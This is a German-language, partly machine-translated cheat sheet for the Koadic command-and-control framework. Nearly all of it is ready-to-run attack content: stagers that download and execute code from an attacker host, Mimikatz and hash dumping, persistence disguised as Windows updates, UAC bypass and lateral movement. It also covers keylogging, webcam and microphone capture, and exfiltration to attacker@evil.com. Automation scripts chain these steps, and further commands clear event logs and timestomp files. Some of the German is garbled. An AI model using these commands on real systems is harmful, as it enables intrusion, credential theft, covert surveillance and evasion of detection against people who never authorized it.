Koadic C2 Framework Cheat Sheet¶
Überblick¶
Koadic ist ein Windows-Post-Exploitation-Framework, das COM-Objekte (Component Object Model) für Befehls- und Kontrolloperationen nutzt. In Python gebaut, konzentriert sich Koadic auf leben-off-the-land Techniken, mit legitimen Windows-Komponenten und JavaScript-Ausführung, um Beharrlichkeit zu erhalten und zu vermeiden, Erkennung und bietet umfassende Post-Exploitation Fähigkeiten.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation¶
Voraussetzungen¶
```bash
Install Python 3.6+ and pip¶
sudo apt update sudo apt install -y python3 python3-pip git
Install system dependencies¶
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
Verify Python version¶
python3 --version ```_
Installation von GitHub¶
```bash
Clone Koadic repository¶
git clone https://github.com/zerosum0x0/koadic.git cd koadic
Install requirements¶
pip3 install -r requirements.txt
Make executable¶
chmod +x koadic ```_
Docker Installation¶
```bash
Clone repository¶
git clone https://github.com/zerosum0x0/koadic.git cd koadic
Build Docker image¶
docker build -t koadic .
Run Koadic container¶
docker run -it --rm -p 9999:9999 koadic
Run with persistent data¶
docker run -it --rm -p 9999:9999 -v $(pwd)/data:/app/data koadic ```_
Kali Linux Installation¶
```bash
Install from Kali repositories¶
sudo apt update sudo apt install koadic
Or install from source¶
git clone https://github.com/zerosum0x0/koadic.git cd koadic pip3 install -r requirements.txt ```_
Basisnutzung¶
Starting Koadic¶
```bash
Start Koadic¶
python3 koadic
Start with specific interface¶
python3 koadic --ip 192.168.1.100
Start with custom port¶
python3 koadic --port 8080
Start in quiet mode¶
python3 koadic --quiet ```_
Kommandozeilenschnittstelle¶
```bash
Koadic command prompt¶
(koadic: sta/js/mshta)#
Get help¶
help
Show available modules¶
show
Use a module¶
use [module_path]
Set module options¶
set [option] [value]
Execute module¶
run
Background current session¶
background ```_
Grundlegende Befehle¶
```bash
List available stagers¶
show stagers
List available implants¶
show implants
List active zombies (compromised hosts)¶
zombies
Interact with zombie¶
zombie [zombie_id]
Kill zombie¶
zombie [zombie_id] kill ```_
Bühnen und Implantate¶
MSHTA Stage¶
```bash
Use MSHTA stager¶
use stager/js/mshta
Set options¶
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT sales
Generate stager¶
run
Generated command¶
mshta http://192.168.1.100:9999/sales
Execute on target¶
mshta.exe http://192.168.1.100:9999/sales ```_
Rundll32 Bühne¶
```bash
Use Rundll32 stager¶
use stager/js/rundll32_js
Set options¶
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT update
Generate stager¶
run
Generated command¶
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.100:9999/update",false);h.Send();eval(h.ResponseText);window.close(); ```_
Regsvr32 Bühne¶
```bash
Use Regsvr32 stager¶
use stager/js/regsvr32
Set options¶
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT api
Generate stager¶
run
Generated command¶
regsvr32 /s /n /u /i:http://192.168.1.100:9999/api scrobj.dll ```_
WScript Bühne¶
```bash
Use WScript stager¶
use stager/js/wscript
Set options¶
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT data
Generate stager¶
run
Generated command¶
wscript.exe //b //e:jscript \192.168.1.100\share\payload.js ```_
PowerShell Stage¶
```bash
Use PowerShell stager¶
use stager/js/powershell
Set options¶
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT ps
Generate stager¶
run
Generated command¶
powershell.exe -exec bypass -window hidden -noni -nop -c "iex((new-object system.net.webclient).downloadstring('http://192.168.1.100:9999/ps'))" ```_
Zombie Management¶
Grundlegende Zombiebefehle¶
```bash
List all zombies¶
zombies
Get zombie information¶
zombie [zombie_id] info
Execute command on zombie¶
zombie [zombie_id] cmd "whoami"
Execute PowerShell on zombie¶
zombie [zombie_id] shell "Get-Process"
Kill zombie¶
zombie [zombie_id] kill
Rename zombie¶
zombie [zombie_id] rename [new_name] ```_
Zombie Interaktion¶
```bash
Interact with specific zombie¶
zombie [zombie_id]
Once in zombie context¶
whoami # Current user hostname # Computer name pwd # Current directory ls # List directory cd [path] # Change directory cat [file] # Read file download [file] # Download file upload [local] [remote] # Upload file ```_
Multi-Zombie Operationen¶
```bash
Execute command on all zombies¶
zombies cmd "systeminfo"
Execute on specific zombies¶
zombies 1,3,5 cmd "whoami"
Execute PowerShell on all zombies¶
zombies shell "Get-ComputerInfo"
Kill all zombies¶
zombies kill ```_
Implantatmodule¶
Systeminformationen¶
```bash
Get system information¶
use implant/gather/enum_system set ZOMBIE [zombie_id] run
Enumerate users¶
use implant/gather/enum_users set ZOMBIE [zombie_id] run
Enumerate processes¶
use implant/gather/enum_process set ZOMBIE [zombie_id] run
Enumerate services¶
use implant/gather/enum_services set ZOMBIE [zombie_id] run ```_
Credential Harvesting¶
```bash
Dump credentials with Mimikatz¶
use implant/gather/mimikatz set ZOMBIE [zombie_id] set COMMAND sekurlsa::logonpasswords run
Dump SAM database¶
use implant/gather/hashdump set ZOMBIE [zombie_id] run
Enumerate stored credentials¶
use implant/gather/enum_creds set ZOMBIE [zombie_id] run
Browser credential extraction¶
use implant/gather/enum_chrome set ZOMBIE [zombie_id] run ```_
Persistenzmechanismen¶
```bash
Registry persistence¶
use implant/persist/registry set ZOMBIE [zombie_id] set PAYLOAD [payload_path] set HIVE HKCU set KEY "Software\Microsoft\Windows\CurrentVersion\Run" set VALUE "WindowsUpdate" run
Scheduled task persistence¶
use implant/persist/schtasks set ZOMBIE [zombie_id] set PAYLOAD [payload_path] set TASKNAME "SystemUpdate" set TRIGGER "ONLOGON" run
Service persistence¶
use implant/persist/service set ZOMBIE [zombie_id] set PAYLOAD [payload_path] set SERVICENAME "WindowsUpdateService" run
WMI persistence¶
use implant/persist/wmi set ZOMBIE [zombie_id] set PAYLOAD [payload_path] set FILTERNAME "ProcessFilter" set CONSUMERNAME "ProcessConsumer" run ```_
Spätere Bewegung¶
```bash
WMI execution¶
use implant/lateral/wmi set ZOMBIE [zombie_id] set TARGET 192.168.1.100 set USERNAME administrator set PASSWORD password123 set COMMAND "whoami" run
PSExec execution¶
use implant/lateral/psexec set ZOMBIE [zombie_id] set TARGET 192.168.1.100 set USERNAME admin set PASSWORD pass123 set COMMAND "systeminfo" run
PowerShell remoting¶
use implant/lateral/winrm set ZOMBIE [zombie_id] set TARGET 192.168.1.100 set USERNAME administrator set PASSWORD password123 set COMMAND "Get-Process" run
SMB execution¶
use implant/lateral/smb set ZOMBIE [zombie_id] set TARGET 192.168.1.100 set SHARE C$ set USERNAME admin set PASSWORD pass123 set COMMAND "dir" run ```_
Vorrechte Eskalation¶
```bash
UAC bypass techniques¶
use implant/elevate/bypassuac_eventvwr set ZOMBIE [zombie_id] set PAYLOAD [payload_path] run
use implant/elevate/bypassuac_fodhelper set ZOMBIE [zombie_id] set PAYLOAD [payload_path] run
use implant/elevate/bypassuac_computerdefaults set ZOMBIE [zombie_id] set PAYLOAD [payload_path] run
Token manipulation¶
use implant/elevate/token_steal set ZOMBIE [zombie_id] set PID [target_pid] run
Service exploitation¶
use implant/elevate/service_unquoted set ZOMBIE [zombie_id] run ```_
Netzwerkaktivitäten¶
```bash
Port scanning¶
use implant/scan/tcp set ZOMBIE [zombie_id] set RHOSTS 192.168.1.0/24 set RPORTS 80,443,22,3389 run
Network discovery¶
use implant/gather/enum_network set ZOMBIE [zombie_id] run
ARP scanning¶
use implant/scan/arp set ZOMBIE [zombie_id] set NETWORK 192.168.1.0/24 run
SMB enumeration¶
use implant/gather/enum_shares set ZOMBIE [zombie_id] set TARGET 192.168.1.100 run ```_
Dateioperationen¶
```bash
File search¶
use implant/gather/file_search set ZOMBIE [zombie_id] set PATH C:\Users set PATTERN *.docx run
Directory listing¶
use implant/gather/dir_list set ZOMBIE [zombie_id] set PATH C:\Users\Administrator\Documents run
File download¶
use implant/gather/download set ZOMBIE [zombie_id] set RPATH C:\Users\Administrator\Documents\sensitive.docx set LPATH ./downloads/sensitive.docx run
File upload¶
use implant/manage/upload set ZOMBIE [zombie_id] set LPATH ./payloads/tool.exe set RPATH C:\Windows\Temp\tool.exe run ```_
Erweiterte Funktionen¶
Pivoting und Tunneling¶
```bash
SOCKS proxy¶
use implant/pivot/socks set ZOMBIE [zombie_id] set LPORT 1080 run
Port forwarding¶
use implant/pivot/portfwd set ZOMBIE [zombie_id] set LPORT 8080 set RHOST 192.168.1.100 set RPORT 80 run
Reverse port forwarding¶
use implant/pivot/rportfwd set ZOMBIE [zombie_id] set LPORT 3389 set RHOST 127.0.0.1 set RPORT 3389 run ```_
Keylogging und Screen Capture¶
```bash
Start keylogger¶
use implant/gather/keylogger set ZOMBIE [zombie_id] set DURATION 300 run
Screen capture¶
use implant/gather/screenshot set ZOMBIE [zombie_id] run
Webcam capture¶
use implant/gather/webcam set ZOMBIE [zombie_id] run
Audio recording¶
use implant/gather/microphone set ZOMBIE [zombie_id] set DURATION 60 run ```_
Daten Exfiltration¶
```bash
HTTP exfiltration¶
use implant/exfil/http set ZOMBIE [zombie_id] set LPATH C:\Users\Administrator\Documents\data.zip set URL http://192.168.1.100:8080/upload run
DNS exfiltration¶
use implant/exfil/dns set ZOMBIE [zombie_id] set LPATH C:\sensitive\data.txt set DOMAIN exfil.example.com run
Email exfiltration¶
use implant/exfil/email set ZOMBIE [zombie_id] set LPATH C:\data\sensitive.docx set SMTP smtp.gmail.com set USERNAME user@gmail.com set PASSWORD password123 set RECIPIENT attacker@evil.com run ```_
Automatisierung und Schrift¶
Python Automation Script¶
```python
!/usr/bin/env python3¶
Koadic automation script¶
import time import subprocess import json import os
class KoadicAutomation: def init(self, koadic_path="./koadic"): self.koadic_path = koadic_path self.zombies = []
def execute_command(self, command):
"""Execute Koadic command"""
try:
result = subprocess.run([
"python3", self.koadic_path,
"-c", command
], capture_output=True, text=True, timeout=30)
return result.stdout
except subprocess.TimeoutExpired:
return "Command timed out"
except Exception as e:
return f"Error: \\\\{str(e)\\\\}"
def setup_listener(self, host="192.168.1.100", port=9999):
"""Setup MSHTA listener"""
commands = [
"use stager/js/mshta",
f"set SRVHOST \\\\{host\\\\}",
f"set SRVPORT \\\\{port\\\\}",
"set ENDPOINT sales",
"run"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(1)
print(f"[+] Listener setup complete")
print(f"[+] Execute on target: mshta http://\\\\{host\\\\}:\\\\{port\\\\}/sales")
def get_zombies(self):
"""Get list of active zombies"""
result = self.execute_command("zombies")
# Parse zombie list from output
# Implementation depends on output format
return self.zombies
def automated_recon(self, zombie_id):
"""Perform automated reconnaissance"""
modules = [
"implant/gather/enum_system",
"implant/gather/enum_users",
"implant/gather/enum_process",
"implant/gather/enum_services",
"implant/gather/enum_network"
]
for module in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}",
"run"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(2)
def credential_harvesting(self, zombie_id):
"""Harvest credentials from zombie"""
modules = [
("implant/gather/mimikatz", "sekurlsa::logonpasswords"),
("implant/gather/hashdump", ""),
("implant/gather/enum_creds", ""),
("implant/gather/enum_chrome", "")
]
for module, command in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
if command:
commands.append(f"set COMMAND \\\\{command\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(3)
def establish_persistence(self, zombie_id):
"""Establish persistence on zombie"""
persistence_modules = [
("implant/persist/registry", \\\\{
"HIVE": "HKCU",
"KEY": "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"VALUE": "WindowsUpdate",
"PAYLOAD": "C:\\Windows\\Temp\\update.exe"
\\\\}),
("implant/persist/schtasks", \\\\{
"TASKNAME": "SystemUpdate",
"TRIGGER": "ONLOGON",
"PAYLOAD": "C:\\Windows\\Temp\\update.exe"
\\\\})
]
for module, options in persistence_modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
for key, value in options.items():
commands.append(f"set \\\\{key\\\\} \\\\{value\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(2)
def lateral_movement(self, zombie_id, targets):
"""Perform lateral movement"""
for target in targets:
modules = [
("implant/lateral/wmi", \\\\{
"TARGET": target,
"USERNAME": "administrator",
"PASSWORD": "password123",
"COMMAND": "whoami"
\\\\}),
("implant/lateral/psexec", \\\\{
"TARGET": target,
"USERNAME": "admin",
"PASSWORD": "pass123",
"COMMAND": "systeminfo"
\\\\})
]
for module, options in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
for key, value in options.items():
commands.append(f"set \\\\{key\\\\} \\\\{value\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(3)
Usage example¶
def main(): automation = KoadicAutomation()
# Setup listener
automation.setup_listener("192.168.1.100", 9999)
# Wait for zombies to connect
print("[+] Waiting for zombies to connect...")
time.sleep(60)
# Get active zombies
zombies = automation.get_zombies()
for zombie_id in zombies:
print(f"[+] Processing zombie: \\\\{zombie_id\\\\}")
# Perform reconnaissance
automation.automated_recon(zombie_id)
# Harvest credentials
automation.credential_harvesting(zombie_id)
# Establish persistence
automation.establish_persistence(zombie_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
automation.lateral_movement(zombie_id, targets)
if name == "main": main() ```_
PowerShell Automation¶
```powershell
Koadic PowerShell automation script¶
function Invoke-KoadicAutomation \\{ param( [string]\(KoadicPath = "./koadic", [string]\)ListenerHost = "192.168.1.100", [int]$ListenerPort = 9999 )
function Execute-KoadicCommand \\\\{
param([string]$Command)
try \\\\{
$result = & python3 $KoadicPath -c $Command 2>&1
return $result
\\\\}
catch \\\\{
Write-Warning "Failed to execute command: $Command"
return $null
\\\\}
\\\\}
# Setup MSHTA listener
Write-Host "[+] Setting up MSHTA listener..."
$commands = @(
"use stager/js/mshta",
"set SRVHOST $ListenerHost",
"set SRVPORT $ListenerPort",
"set ENDPOINT sales",
"run"
)
foreach ($cmd in $commands) \\\\{
Write-Host "[+] Executing: $cmd"
Execute-KoadicCommand -Command $cmd
Start-Sleep -Seconds 1
\\\\}
Write-Host "[+] Listener setup complete"
Write-Host "[+] Execute on target: mshta http://$ListenerHost`:$ListenerPort/sales"
# Wait for zombies
Write-Host "[+] Waiting for zombies to connect..."
Start-Sleep -Seconds 60
# Get zombie list (simplified - would need proper parsing)
$zombieResult = Execute-KoadicCommand -Command "zombies"
# Process each zombie (example with zombie ID 0)
$zombieId = 0
Write-Host "[+] Processing zombie: $zombieId"
# Reconnaissance modules
$reconModules = @(
"implant/gather/enum_system",
"implant/gather/enum_users",
"implant/gather/enum_process",
"implant/gather/enum_services"
)
foreach ($module in $reconModules) \\{
Write-Host "[+] Running module: $module"
Execute-KoadicCommand -Command "use $module"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
Execute-KoadicCommand -Command "run"
Start-Sleep -Seconds 3
\\}
# Credential harvesting
Write-Host "[+] Harvesting credentials..."
$credModules = @(
@\\{Module = "implant/gather/mimikatz"; Command = "sekurlsa::logonpasswords"\\},
@\\{Module = "implant/gather/hashdump"; Command = ""\\},
@\\{Module = "implant/gather/enum_creds"; Command = ""\\}
)
foreach ($item in $credModules) \\{
Write-Host "[+] Running module: $($item.Module)"
Execute-KoadicCommand -Command "use $($item.Module)"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
if ($item.Command) \\{
Execute-KoadicCommand -Command "set COMMAND $($item.Command)"
\\}
Execute-KoadicCommand -Command "run"
Start-Sleep -Seconds 5
\\}
# Establish persistence
Write-Host "[+] Establishing persistence..."
Execute-KoadicCommand -Command "use implant/persist/registry"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
Execute-KoadicCommand -Command "set HIVE HKCU"
Execute-KoadicCommand -Command "set KEY Software\Microsoft\Windows\CurrentVersion\Run"
Execute-KoadicCommand -Command "set VALUE WindowsUpdate"
Execute-KoadicCommand -Command "set PAYLOAD C:\Windows\Temp\update.exe"
Execute-KoadicCommand -Command "run"
Write-Host "[+] Automation completed"
\}
Execute automation¶
Invoke-KoadicAutomation -ListenerHost "192.168.1.100" -ListenerPort 9999 ```_
Bash Automation Script¶
```bash
!/bin/bash¶
Koadic bash automation script¶
KOADIC_PATH="./koadic" LISTENER_HOST="192.168.1.100" LISTENER_PORT="9999"
Function to execute Koadic commands¶
execute_koadic_command() \{ local command="\(1" echo "[+] Executing: \(command" python3 "\)KOADIC_PATH" -c "\)command" sleep 1 \}
Setup MSHTA listener¶
echo "[+] Setting up MSHTA listener..." execute_koadic_command "use stager/js/mshta" execute_koadic_command "set SRVHOST $LISTENER_HOST" execute_koadic_command "set SRVPORT $LISTENER_PORT" execute_koadic_command "set ENDPOINT sales" execute_koadic_command "run"
echo "[+] Listener setup complete" echo "[+] Execute on target: mshta http://\(LISTENER_HOST:\)LISTENER_PORT/sales"
Wait for zombies¶
echo "[+] Waiting for zombies to connect..." sleep 60
Process zombie (example with zombie ID 0)¶
ZOMBIE_ID=0 echo "[+] Processing zombie: $ZOMBIE_ID"
Reconnaissance¶
echo "[+] Performing reconnaissance..." recon_modules=( "implant/gather/enum_system" "implant/gather/enum_users" "implant/gather/enum_process" "implant/gather/enum_services" "implant/gather/enum_network" )
for module in "$\{recon_modules[@]\}"; do echo "[+] Running module: $module" execute_koadic_command "use $module" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "run" sleep 3 done
Credential harvesting¶
echo "[+] Harvesting credentials..." execute_koadic_command "use implant/gather/mimikatz" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "set COMMAND sekurlsa::logonpasswords" execute_koadic_command "run" sleep 5
execute_koadic_command "use implant/gather/hashdump" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "run" sleep 5
Establish persistence¶
echo "[+] Establishing persistence..." execute_koadic_command "use implant/persist/registry" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "set HIVE HKCU" execute_koadic_command "set KEY Software\Microsoft\Windows\CurrentVersion\Run" execute_koadic_command "set VALUE WindowsUpdate" execute_koadic_command "set PAYLOAD C:\Windows\Temp\update.exe" execute_koadic_command "run"
execute_koadic_command "use implant/persist/schtasks" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "set TASKNAME SystemUpdate" execute_koadic_command "set TRIGGER ONLOGON" execute_koadic_command "set PAYLOAD C:\Windows\Temp\update.exe" execute_koadic_command "run"
echo "[+] Automation completed" ```_
Integration mit anderen Tools¶
Metasploit Integration¶
```bash
Use Koadic for initial access, pivot to Metasploit¶
Generate Metasploit payload¶
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Koadic zombie¶
use implant/manage/upload set ZOMBIE [zombie_id] set LPATH ./meterpreter.exe set RPATH C:\Windows\Temp\update.exe run
Execute Metasploit payload¶
zombie [zombie_id] cmd "C:\Windows\Temp\update.exe"
Handle in Metasploit¶
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Integrieren der Welt¶
```bash
Generate Empire stager¶
Use Koadic for initial access, pivot to Empire¶
From Koadic zombie¶
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
Handle in Empire¶
./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```_
Cobalt Strike Integration¶
```bash
Beacon integration¶
Generate Cobalt Strike beacon¶
Use Koadic for initial access, pivot to Beacon¶
From Koadic zombie¶
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server¶
```_
Operationelle Sicherheit¶
Kommunikationssicherheit¶
```bash
Use HTTPS with valid certificates¶
Configure domain fronting¶
Implement certificate pinning¶
Use legitimate user agents¶
Example HTTPS configuration¶
Generate SSL certificates¶
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Configure Koadic with SSL (if supported)¶
Use reverse proxy with SSL termination¶
```_
Verkehrsobfukation¶
```bash
Use legitimate Windows binaries¶
Implement jitter and delays¶
Mimic legitimate traffic patterns¶
Use common ports and protocols¶
Example obfuscated execution¶
mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """"& \{Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 30); IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100:9999/sales')\}"""", 0, False")(window.close) ```_
Anti-Forensik¶
```bash
Clear event logs¶
zombie [zombie_id] cmd "wevtutil cl System" zombie [zombie_id] cmd "wevtutil cl Security" zombie [zombie_id] cmd "wevtutil cl Application"
Clear PowerShell history¶
zombie [zombie_id] shell "Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
Timestomping¶
zombie [zombie_id] shell "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'" ```_
Fehlerbehebung¶
Gemeinsame Themen¶
```bash
Zombie not connecting¶
- Check firewall rules
- Verify listener configuration
- Test network connectivity
- Check antivirus interference
Python dependency issues¶
pip3 install --upgrade -r requirements.txt
Module execution failures¶
Check zombie status¶
zombies
Verify module options¶
show options ```_
Debug Mode¶
```bash
Enable verbose logging¶
python3 koadic --verbose
Check network connectivity¶
telnet 192.168.1.100 9999
Test stager execution¶
mshta http://192.168.1.100:9999/sales ```_
Best Practices¶
Betriebsplanung¶
- **Pre-engagement Setup*: Bühnen- und Hörer vor dem Engagement konfigurieren
- Zombie Management: Deskriptive Zombie-Namen verwenden und durch Netzwerk organisieren
- ** Kommunikationsprotokolle*: Sichere C2-Kommunikationskanäle erstellen
- Datenhandling: Implementierung einer sicheren Datenerfassung und -speicherung
- **Cleanup-Verfahren* Plan für Artefakte Entfernung und Zombie-Reinigung
Sicherheitsüberlegungen¶
```bash
Secure deployment¶
Use strong authentication¶
Enable HTTPS with valid certificates¶
Implement network segmentation¶
Regular security updates¶
Zombie management¶
Use unique zombie identifiers¶
Implement zombie timeouts¶
Regular zombie rotation¶
Secure communication channels¶
```_
Dokumentation und Reporting¶
```bash
Operation documentation¶
Maintain zombie logs¶
Document all activities¶
Track compromised systems¶
Generate executive reports¶
Artifact tracking¶
Monitor IOCs¶
Document forensic artifacts¶
Implement attribution prevention¶
```_
Ressourcen¶
- [Koadic GitHub Repository](LINK_5_
- Koadische Dokumentation
- (LINK_5_)
- [MITRE ATT&CK Framework](LINK_5_
- (SANS Red Team Operations)(LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Koadic C2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *